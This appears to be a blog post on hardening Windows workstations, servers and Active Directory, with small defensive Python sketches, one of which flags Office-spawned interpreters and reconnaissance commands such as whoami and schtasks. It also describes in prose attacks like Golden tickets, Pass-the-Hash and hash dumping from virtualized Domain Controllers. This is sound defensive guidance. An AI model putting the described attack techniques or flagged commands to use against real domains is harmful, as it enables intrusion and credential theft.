Application whitelisting is a serious task, and its overhead discourages IT from ever starting the implementation (mostly on pre-existing infrastructures). While I agree to some extent, there is another angle to this problem, especially if the choice is between doing nothing and doing it partially (you may argue that the "partial" approach is not a fully secure solution, but it's much better than nothing). Microsoft's AppLocker, which comes for free with Windows Enterprise versions, is pure awesomeness of love and hate. It does a great job, and the entire setup can be automated using AaronLocker, which generates the AppLocker configuration automatically. That is great if you are deploying new workstations or creating a new environment, but that is rarely the case I encounter. Thinking broadly, the reason for implementing this solution is to reduce the attack surface by blocking files/scripts from execution. Going further, malicious execution (the patient 0 case) initially occurs from user-owned folders - under the user profile path in C:\Users\<username>\. With that being said, AppLocker has a default rules implementation, which allows everything installed in C:\Windows and %PROGRAMFILES% to continue executing, while blocking execution from all other locations. It also allows anyone in the "Administrators" group on the workstation to bypass the rules and continue executing without restrictions (unless a file has been specifically denied from execution, which at that point affects the Administrators as well). This ensures that anything installed on the machine so far continues to run (unless it is installed in a user folder), which reduces the risk of impacting daily business operations while rolling out this solution. AppLocker is not perfect, and the default rules are easy to bypass, which lets an attacker execute anything they like.
Although AaronLocker's approach is the recommended one, if it is currently infeasible in your environment, there is no argument for not going forward with at least the default rules, which limit potential malicious execution to a great extent (from the users' Downloads folder and AppData, specifically the temporary locations there). If you go the default rules way, I also recommend looking into this list of AppLocker bypasses and blocking as many of them as your environment can possibly handle without breaking. You should also block anything else that you consider dangerous, as well as tools such as PowerShell (or at least set it to Constrained Language mode on workstations). AppLocker provides 3 ways to block/allow a file's execution. If you block a file's execution, I'd recommend against blocking by the file's hash value - here is why. If possible, block and allow by Publisher rule for the specific application in question.
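To illustrate the logic of the default rules as described above, here is a deliberately simplified sketch. It is not how AppLocker is implemented or configured: the function names are hypothetical, literal paths stand in for the environment variables, and publisher/hash rules are ignored entirely.

```python
import ntpath

# Folders covered by the default allow rules described above.
# Assumption: literal paths are used in place of the environment variables.
DEFAULT_ALLOWED_ROOTS = [r"C:\Windows", r"C:\Program Files"]


def _normalize(path):
    """Lower-case and collapse the path so comparisons ignore case and '..'."""
    return ntpath.normcase(ntpath.normpath(path))


def is_under(path, root):
    """True if path is located inside root (not merely sharing a name prefix)."""
    return _normalize(path).startswith(_normalize(root) + "\\")


def may_execute(path, user_is_local_admin, explicit_deny=()):
    """Simplified decision: explicit deny wins, then admins, then default roots."""
    if any(_normalize(path) == _normalize(denied) for denied in explicit_deny):
        return False
    if user_is_local_admin:
        return True
    return any(is_under(path, root) for root in DEFAULT_ALLOWED_ROOTS)
```

Under these assumptions, a payload dropped into C:\Users\alice\Downloads is blocked for a regular user but not for a local administrator, which is one more reason not to hand out administrative rights to regular accounts.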

NOTE - The SYSTEM user is not affected by AppLocker's restrictions, so anything running under that user (services, tasks, GPOs) will continue to operate without limitations.

Credential Guard is a feature that was introduced with Windows 10, which eliminates credential caching on the machines for local logins. Although it has quite some limitations, it is a step forward in preventing "Credential theft" abuse.

It has the following requirements to be enabled:

Support for Virtualization-based security (required)

64-bit CPU

CPU virtualization extensions plus extended page tables

Windows hypervisor

Secure boot (required)

TPM 1.2 or 2.0, either discrete or firmware (preferred - provides binding to hardware)

UEFI lock (preferred - prevents attacker from disabling with a simple registry key change)

The built-in Administrator account (RID 500) should have a unique password on each workstation. A free approach is to utilize Microsoft's Local Administrator Password Solution (LAPS). It extends the Domain's schema by adding attributes to the computer objects - one for storing the password of the Administrator account for that computer, and another for storing the time at which that password expires. By policy, you can configure the length of the password and how often it should be refreshed automatically. By default, Domain administrators have access to the password attribute, but it is possible to delegate permissions to other groups or individuals. For example, you may give the IT Service desk in Berlin access only to the passwords of the computers in the Berlin office. I have also seen misconfigurations of delegated access to LAPS passwords. This script is phenomenal at identifying and reporting all users/groups that have access to the LAPS password of each computer.

I highly recommend denying network logins for this account. This can be achieved through the GPO setting "Deny access to this computer from the network" under "User Rights Assignment". This mitigates the risk of an adversary who has (somehow) obtained the passwords abusing the account to connect remotely to (and probably infect) other machines in the environment.

Disable the following:

NetBIOS

LLMNR

Windows Browser protocol

PowerShell version 2 (it exists on Windows 10 for some reason, although the default one is version 5)

SMBv1

WPAD

Control scripting file extensions such as .js, .vbs and .hta, so that they open in another application such as notepad instead of being executed upon double click (the list can be very long and also include .bat and .cmd if they are not used across your organization, but be careful, as I've seen this break things multiple times).

Enable GPO refresh even if there are no changes to "fight" against local changes that may occur by privileged users. TrustedSec released a great post on the topic.

Office Macros and OLE objects are greatly abused to deliver malware, and they are extremely successful. One of the main reasons is that many organizations rely on Macros and simply cannot disable them, while users are used to pressing that deadly "Enable Macros" button. Obviously, I would advise disabling them but, as I said, it's often not possible. The next best option is to allow only macros signed by you to execute.

I have noticed that NextGen Antivirus software has been improving quite a bit in this area; it now automatically blocks unusual processes spawned by Office documents (e.g. PowerShell), as well as other activity based on unusual behavior. Sysmon can be a great help here too, as it provides an overview of how Office documents interact with other Windows components, which is another way of identifying malicious activity at a very early stage.

Host-based firewalls are heavily overlooked - the least you should do on a workstation is manage the firewall profiles (public, private and domain), drop local rules that are added or already exist, and disable incoming connections, except those that are explicitly needed such as DHCP, RDP or similar.

Third-party applications, at least the ones that are most commonly exploited, should definitely be patched on an ongoing basis, as soon as a new version is released. Applications that come to mind are "Flash", "Java", Microsoft Office products and browsers. If I am not mistaken, there are products that will patch these for free.

Enable PowerShell logging, even if PowerShell.exe is blocked by applications such as AppLocker, and regularly monitor the executed commands. The main reason is that PowerShell.exe is not PowerShell itself but a wrapper around the engine. A simple C# program can act the same way that PowerShell.exe does.

Lee Holmes released a great post, some years back, on security features introduced with PowerShell version 5 and how they can be utilized.

Enable BitLocker.

Deploy one of those fancy "NextGen" Antivirus products; although not perfect, they have been doing a great job lately. This also goes for the free built-in Windows Defender - I would probably stick with it over some of the big-name competitors, who are lagging behind.

Another great feature to consider implementing is Device Guard for enforcing whitelisting on top of AppLocker.

WARNING! #DontDoThisAtHome

The activities described above, are very likely to break something in your environment. Here are a few examples that I have experienced:

Setting notepad as the default application for .bat and .cmd files broke login scripts written in Batch. In a virtualized environment (VMware specifically), certain actions such as "log off"/"Disconnect" from the VMware menu bar didn't work as in the process they were calling .bat files.

Disabling NTLM authentication broke the backup solution. I've tried NTLM auditing multiple times since, and in every single environment NTLM authentication turned out to be actively used by some tool, so I've never actually disabled it permanently.

Network level authentication for RDP will automatically deny connection requests originating from devices that are not part of the Domain (or do not have a certificate issued by the Domain's PKI). I left the external IT service provider of my customers without access to any of the servers because of this - you could imagine that I was quite "popular" (all of them used devices issued by their company, the IT service provider, to connect to all of their customers) ;/

AppLocker blocks OneDrive and Microsoft Teams, because they are installed in %APPDATA%. (PalmFaceEmoji). To fix this, allow the application to execute through an AppLocker Publisher rule that contains the application name.

Enabling AppLocker script rules automatically sets PowerShell to Constrained Language mode. This will potentially break the execution of scripts that run under a non-privileged user.

Disabling SMBv1 on a network with older Windows devices such as Server 2003, breaks the connection.

Windows Server

In theory, everything from above, is valid here too. Microsoft's Security Baseline, also contains Server settings. In addition, you should also focus on disabling unnecessary services and where possible utilize Remote Credential Guard, which protects user credentials on remote logins, however it has quite serious limitations (in fact, only the locally logged on users on a machine can use the feature as it is not possible to "switch" the context by providing credentials of another user on the RDP connection window).

If you have a large organization, features such as Just Enough Administration might be quite useful to ensure that only the required, limited privileges are assigned. Likewise for Just-in-Time Administration, which is part of Microsoft's PAM solution and provides a user with administrative rights only when they are required. To accomplish this, it relies on temporary, rather than permanent, membership of a security group that has been delegated privileges.

Consider blocking direct Internet connections.

Domain Controllers

Let me quote Microsoft from their article on Hardening Domain Controllers:

"Compromising a domain controller can provide the most expedient path to wide scale propagation of access, or the most direct path to destruction of member servers, workstations, and Active Directory. Because of this, domain controllers should be secured separately and more stringently than the general Windows infrastructure."

When hardening Domain Controllers, there should be no compromise on which security features to enable. These servers' sole purpose should be to act as Domain Controllers, with no other third-party tools/software installed or running. Device Guard should definitely be enabled!

Although discussed later on, login access to Domain Controllers should be granted only to those (I can't imagine more than 2-3 people) who need to log in to them to update Active Directory, update the servers and for Disaster recovery purposes. Remote login connections should only be accepted if they are coming from trusted devices, such as Privileged Access Workstations (see below), and even then, multi-factor authentication should be required.

Jump hosts? Nope. Privileged Access Workstations

Oftentimes, I encounter Management servers/Jump hosts that are utilized to remotely control a big part of the environment. Those servers (1 or 2) have a bunch of tools installed, and every privileged account uses them to store sensitive data and to initiate remote connections to other hosts. This is not a secure design, and in all cases where I've observed it, it represents a single point of failure for the entire directory (because Domain admins are logged on to the servers). Think about this for a second - how do you connect to that Jump host? 10 out of 10 times, the answer I've received is "I use RDP from my workstation and my admin account to connect to it". Do you see it? Admin credentials are entered on an untrusted workstation, which is used to browse the internet and read emails, and is therefore exposed to a major attack surface. Compromising an admin's regular workstation and performing keylogging will result in compromising their Admin account. Another factor here is that the Jump host will be heavily populated with users, some privileged, others not so much, but they will all have administrative rights on that Jump host. Credential theft and RDP Null session (from the previous chapter) are the obvious attack vectors to compromise other accounts on the same host.

There are other approaches as well, for example using the workstation's host operating system as a trusted, secure environment for administrative duties, while a virtual machine is used for regular tasks and non-administrative accounts. But at this point, you rely on admins actually following that approach, which in my experience is never the case.

The only real solution that I have seen is a separate Privileged Access Workstation. The term is defined by Microsoft as follows:

"Privileged Access Workstations (PAWs) provide a dedicated operating system for sensitive tasks that is protected from Internet attacks and threat vectors. Separating these sensitive tasks and accounts from the daily use workstations and devices provides very strong protection from phishing attacks, application and OS vulnerabilities, various impersonation attacks, and credential theft attacks such as keystroke logging, see Pass-the-Hash, and Pass-The-Ticket".

This workstation is completely locked down (similar to Domain Controllers), no Internet connection is allowed from it (unless it is provisioned to Cloud admins), no incoming connections are accepted and very few programs are allowed to execute (RDP being the main one). Ideally, Domain Controllers will be allowed to accept connections only from these workstations (IPsec can be utilized to encrypt the connection), and the only accounts allowed to login to them are Domain/Enterprise admins or equivalent. Those accounts, should also not be allowed to login (either locally or remotely) to any other system (through a technical control) to mitigate the risk of credential theft.

2.3 Active Directory administrative tier model

The tiered administrative model is a segregation into multiple buffer zones that aims to separate high-risk, often compromised devices such as regular workstations from valuable ones such as Domain Controllers, PKI and others that your business depends on. The segregation itself is implemented through technical controls that prevent certain actions from occurring. The most obvious one, which follows from the previous section, is that Domain admins are technically not allowed to log in to any workstation or member server in the environment. Why not? This effectively reduces the risk of those accounts' credentials being compromised through the Credential theft shuffle, which was mentioned on multiple occasions in this post already. By the way, whether credentials are cached on the local or remote host depends on the type of login (local, RDP, network login with PsExec etc) - additional details provided by Microsoft here. But the model goes a lot further than that example.

WARNING - If you can, you really should implement the model as described by Microsoft (with a few tweaks to fit your environment). Unfortunately, in my experience, it usually makes many admins angry with the amount of new accounts and systems, breaks the way systems work and therefore requires compromises to be made. What the rest of this subsection covers is the bare minimum I recommend implementing, with no compromises on that!

So, why is it called tier model and what are those buffer zones? Microsoft's suggestion is a model of 3 different tiers/layers - Tier 0, Tier 1 and Tier 2, where each represents different systems and administrative accounts for those systems based on certain classification. Microsoft defines them as follows:

Tier 0 - Direct Control of enterprise identities in the environment. Tier 0 includes accounts, groups, and other assets that have direct or indirect administrative control of the Active Directory forest, domains, or domain controllers, PKI and all the assets in it. The security sensitivity of all Tier 0 assets is equivalent as they are all effectively in control of each other.

Tier 1 - Control of enterprise servers and applications. Tier 1 assets include server operating systems, cloud services, and enterprise applications. Tier 1 administrator accounts have administrative control of a significant amount of business value that is hosted on these assets.

Tier 2 - Control of user workstations and devices. Tier 2 administrator accounts have administrative control of a significant amount of business value that is hosted on user workstations and devices.

The administrative accounts in those tiers have the following access rights and permissions defined:

Tier 0:

Can manage and control assets at any level (tier) as required

Can only log on interactively or access assets trusted at the Tier 0 level

Tier 1

Can only manage and control assets at the Tier 1 or Tier 2 level

Can only access assets (via network logon type) that are trusted at the Tier 1 or Tier 0 levels

Can only interactively log on to assets trusted at the Tier 1 level

Tier 2

Can only manage and control assets at the Tier 2 level

Can access assets (via network logon type) at any level as required

Can only interactively log on to assets trusted at Tier 2 level

Note that Tier 0 administration is different from administration of other tiers because all Tier 0 assets already have direct or indirect control of all assets. As an example, an attacker in control of a DC has no need to steal credentials from logged on administrators as they already have access to all domain credentials in the database.
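The logon restrictions listed above can be written down as a small lookup table, which is handy when reviewing logon events against the model. This is only a sketch of the rules as listed; the function name and the two logon type labels are my own shorthand.

```python
# Rules transcribed from the list above: for each admin tier, the asset tiers
# it may log on to interactively and the tiers it may reach via network logon.
LOGON_RULES = {
    0: {"interactive": {0}, "network": {0}},
    1: {"interactive": {1}, "network": {0, 1}},
    2: {"interactive": {2}, "network": {0, 1, 2}},
}


def logon_allowed(admin_tier, asset_tier, logon_type):
    """Return True if an admin of admin_tier may perform this logon on asset_tier."""
    if admin_tier not in LOGON_RULES:
        raise ValueError(f"unknown admin tier: {admin_tier}")
    if logon_type not in ("interactive", "network"):
        raise ValueError(f"unknown logon type: {logon_type}")
    return asset_tier in LOGON_RULES[admin_tier][logon_type]
```

For example, logon_allowed(0, 2, "interactive") is False: a Tier 0 account (say, a Domain admin) logging on to a regular workstation is exactly what the model is meant to prevent.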

With those definitions in place, we need to ensure, through technical controls, that only the predefined logon practices are possible in the environment. The controls are defined in the table below:

Only supported/recommended options should be used.

Forbidden support methods may never be used.

No internet browsing or email access may be performed by any administrative account at any time (this can be also controlled by user/group profile at the physical Firewall).

The administrative accounts should have the following restrictions:

No accessing email with admin accounts or from admin workstations.

No browsing the public Internet with admin accounts or from admin workstations (exceptions are the use of a web browser to administer a cloud-based service, such as Microsoft Azure, Amazon Web Services, Microsoft Office 365, or enterprise Gmail).

Store service and application account passwords in a secure location.

No administrative account is allowed to use a password alone for authentication.

Tier 0 accounts should be members of the Protected Users group. Because of the limitations that membership imposes, enforce it on all other administrative accounts only where possible.

The built-in Active Directory groups should be strictly controlled and monitored. Those groups include:

Enterprise Admins

Domain Admins

Schema Admins

BUILTIN\Administrators

Account Operators

Backup Operators

Print Operators

Server Operators

Domain Controllers

Read-only Domain Controllers

Group Policy Creator Owners

Cryptographic Operators

Distributed COM Users

Other Delegated Groups (that you have created)
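One simple way to monitor these groups is to compare periodic snapshots of their membership. The sketch below assumes that the snapshots (a mapping of group name to a set of member names) are exported by some other tool; the function name is hypothetical.

```python
def membership_changes(previous, current):
    """Compare two {group: set(members)} snapshots and list additions/removals."""
    changes = []
    for group in sorted(set(previous) | set(current)):
        before = previous.get(group, set())
        after = current.get(group, set())
        # Members present now but not before were added since the last snapshot.
        for member in sorted(after - before):
            changes.append((group, "added", member))
        # Members present before but not now were removed.
        for member in sorted(before - after):
            changes.append((group, "removed", member))
    return changes
```

Every tuple returned is something that should be explainable by a documented change; anything else deserves a closer look.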

The Builtin\Administrator should be used only as an emergency access account, the usage procedure of which, should include changing the password after each documented use of it.

With all that has been said about the Tier model separation, one thing that must be addressed is administrative accounts that likely have higher privileges than intended. The three most common scenarios that I have seen are SCCM admins, Virtualization admins and Backup operators. In a normal implementation, these would be considered Tier 1 systems and administrative accounts, but if the SCCM agent is running on the Domain Controller, you should really consider your SCCM server and admins as part of Tier 0 (the SCCM agent has the capability to spawn a remote shell with SYSTEM access on the Domain Controller). Likewise, if any Tier 0 systems are virtualized, say a Domain Controller, a virtualization admin can, among other things, "dump" Active Directory's password hashes from the machine's storage and then crack them offline, perform Pass-the-hash (PtH), or create Golden tickets with KRBTGT's password hash. PtH is mitigated if the targeted account is a member of the Protected Users group, which forbids NTLM authentication among other restrictions. Likewise, Backup operators can do the same from a (non-encrypted) backup of a Domain Controller.

2.4 User account types

User accounts have different purposes and usage. Because of that, you shouldn't manage them all in the same manner. The (quite obvious) account types are:

Regular user accounts

Administrative accounts

Service and other accounts

(VIP) The organization's C-executives or other management that may be targeted specifically

What I want to outline here is the password policies for those accounts. Often there is one single default domain policy that requires a length of 8 characters with complexity enabled. While this might satisfy an IT auditor's compliance list, it is far from sufficient. Moreover, it allows users to set a password such as "Password1", which meets the requirement but is weak. My recommendation is a trade-off where the length requirement is increased but users are required to change their passwords less often (unless a compromise is suspected):

Regular user accounts - 14 characters (or more)

Administrative accounts - 20 characters (or more)

Service accounts - 100 characters (or more). Unfortunately, some applications have much lower maximum length of allowed passwords so in those cases at least 32 characters (or the maximum allowed by the application). The following PowerShell script can be used to generate random passwords.

VIP - 20 characters (or more)
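As a language-neutral illustration of what a random password generator does (this is not the PowerShell script referenced above), here is a minimal sketch. The minimum lengths come from the list above; the dictionary keys, the function name and the choice of alphabet are my own assumptions.

```python
import secrets
import string

# Minimum lengths recommended in the list above, keyed by account type.
MIN_LENGTH = {"regular": 14, "admin": 20, "service": 100, "vip": 20}

# Assumed alphabet: letters, digits and punctuation. Some applications reject
# certain symbols, in which case the alphabet has to be narrowed.
ALPHABET = string.ascii_letters + string.digits + string.punctuation


def generate_password(length, alphabet=ALPHABET):
    """Return a random password drawn from a cryptographically secure source."""
    if length < 1:
        raise ValueError("length must be at least 1")
    return "".join(secrets.choice(alphabet) for _ in range(length))
```

A service account password would then be created with generate_password(MIN_LENGTH["service"]), or with a length of 32 where the application does not accept more. The secrets module is used instead of random because the latter is not intended for security purposes.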

KRBTGT

This is a default, disabled user account which exists in every Active Directory domain. The account cannot be deleted, changed or enabled. It is used behind the scenes to encrypt and sign all Kerberos tickets for the domain. Because of its role, if this account's password hash is compromised, an attacker can create and sign their own Kerberos tickets with self-defined privileges, including Domain/Enterprise admin - the attack is known as "Golden ticket". Because of that risk, Microsoft recommends that the password of this account is changed twice on a regular basis. It should be changed twice because Active Directory stores KRBTGT's current password and the previous one (both of which will work to sign and encrypt tickets). By resetting it twice, you ensure that the old hash is also gone from the "previous password" slot, which it moves into after the first change. The proposed method is through this script available on TechNet. The script will change the KRBTGT account password once for a domain, force replication, and monitor change status.

The second reset should not happen immediately after the first: replication is not instantaneous, and resetting again before the first change has reached all Domain Controllers may break your directory.
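The timing decision for the second reset can be sketched as a simple check. Everything here is an assumption for illustration: the function name is made up, the replication status per Domain Controller is supposed to come from whatever tool you use to verify replication, and the 10 hour minimum wait reflects the default maximum lifetime of a Kerberos user ticket, so adjust it if your policy differs.

```python
from datetime import datetime, timedelta


def second_reset_is_safe(first_reset, now, dc_replicated, min_wait=timedelta(hours=10)):
    """Decide whether the second KRBTGT reset can go ahead.

    dc_replicated maps each Domain Controller name to True once it has
    received the first password change (hypothetical input).
    """
    # An empty mapping means replication was never verified, so do not proceed.
    all_replicated = bool(dc_replicated) and all(dc_replicated.values())
    waited_long_enough = now - first_reset >= min_wait
    return all_replicated and waited_long_enough
```

The check is intentionally conservative: it refuses the second reset when replication has not been confirmed on every Domain Controller, or when tickets issued before the first reset may still be valid.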

2.5 Logging and alerting (SIEM)

I am sure you've all heard "it is not a matter of if but when businesses will come under attack from hackers". Everything described up to this point aims to reduce the attack surface (reducing the risk of a successful compromise) and the impact, should one occur. The right mentality is "assume breach, but then what?", which is also the approach I often recommend for Penetration tests. Establishing a foothold in an organization can be a lengthy process, and you'd end up paying a large amount of money for literally no value, because sooner or later someone will click that malicious link or open a malicious attachment. For me, the most value from a Penetration test comes after the initial foothold is established, when the testers try to compromise other systems and move laterally towards a pre-defined goal that, if achieved, makes the test successful (it could be access to a certain system, access to the CEO's mailbox, gaining Domain admin etc). Now, if you think about it, the Penetration testers will be running tools and scripts that are not normally executed in your environment, which puts you a step ahead, because it will all be executed on devices that you own. At this point, having and analyzing logs (the default Windows logs alone are insufficient to trace activity) is fundamental. In fact, in 2019, there should be no excuse for not having a SIEM system, even if it is a free one such as the ELK stack or Graylog (although it may not have every feature you wish it did).

Some of the things that I recommend you track (and verify that they are actually detected during Penetration tests):

Monitor execution of PowerShell (even if it is disabled!) and the commands executed themselves through PowerShell logging.

Track and monitor usage of administrative accounts (successful and failed attempts). Ideally, this should occur from privileged access workstations only.

Track and monitor usage of disabled accounts and emergency accounts.

Monitor for new accounts added/deleted from privileged groups.

Monitor processes that are spawned by Word/Excel/Adobe/Browsers (this may reveal a compromise at a very early stage).

Monitor the usage of Windows commands that are widely used for reconnaissance or exploitation - whoami, net, at, reg, schtasks and all of these LOLBAS. Actually, block them from execution if possible.

Monitor for credential dumping attempts - there is an enormous amount of resources on this topic, such as this one.
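Two of the items above (processes spawned by Office applications and the use of reconnaissance commands) can be sketched as simple rules over process-creation events. The sketch assumes events shaped like Sysmon's process creation event, with Image and ParentImage fields; the watch lists are illustrative and far from complete, and the alert labels are made up.

```python
import ntpath

# Illustrative watch lists only; extend them for your environment.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SUSPICIOUS_CHILDREN = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
RECON_COMMANDS = {"whoami.exe", "net.exe", "at.exe", "reg.exe", "schtasks.exe"}


def _image_name(path):
    """Extract the lower-cased executable name from a full Windows path."""
    return ntpath.basename(path).lower()


def classify(event):
    """Return a list of alert labels for one process-creation event."""
    alerts = []
    child = _image_name(event.get("Image", ""))
    parent = _image_name(event.get("ParentImage", ""))
    if parent in OFFICE_PARENTS and child in SUSPICIOUS_CHILDREN:
        alerts.append("office-spawned-interpreter")
    if child in RECON_COMMANDS:
        alerts.append("recon-command")
    return alerts
```

Matching on the file name alone is easy to evade (a renamed binary will slip through), so in a real SIEM rule you would also want to match on hashes or original file names where the log source provides them.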

You should also set some internal honey pots, in the sense of "traps" that will detect malicious activity. Just as an example, you can create an XML file in SYSVOL, and remove privileges of any user to have access to it. There is absolutely no business need for any user to access that file, so any detected activity against it is potentially an attacker performing the attack described in the section "Group Policy Preferences".

If you confirm a security incident, don't try to investigate it yourself, unless you know exactly what you are doing. A single wrong decision, may trigger an adversary to figure out that you are after them, in which case they could potentially lock down your entire network with all systems and data in it. Incident response is an incredibly complex task, which requires deep knowledge and understanding beyond looking into logging systems - such as File system forensics, Memory forensics, Network forensics, understanding different persistence mechanisms and a lot more. Moreover, for efficient Incident Response, you need pre-defined "Play books", tools that can remotely access forensic artifacts and powerful workstations that can process that evidence. In this case, evidence is gathered artifacts from (potentially) infected machines that can be analyzed to create a timeline of actions that occurred such as program execution, file opening etc. One thing that you should do to aid investigations (Incident Response that is), is to prepare for it - often referred to as Incident Response Readiness (I will not discuss this, as it can be a whole blog post on its own).

~ I did everything above, now what? ~

That's great! But in reality, that was only the beginning of the journey. Going forward, on a weekly/monthly basis, you should perform everything discussed in the first chapter to verify that all configurations still match what is described in your policies.

Stay safe!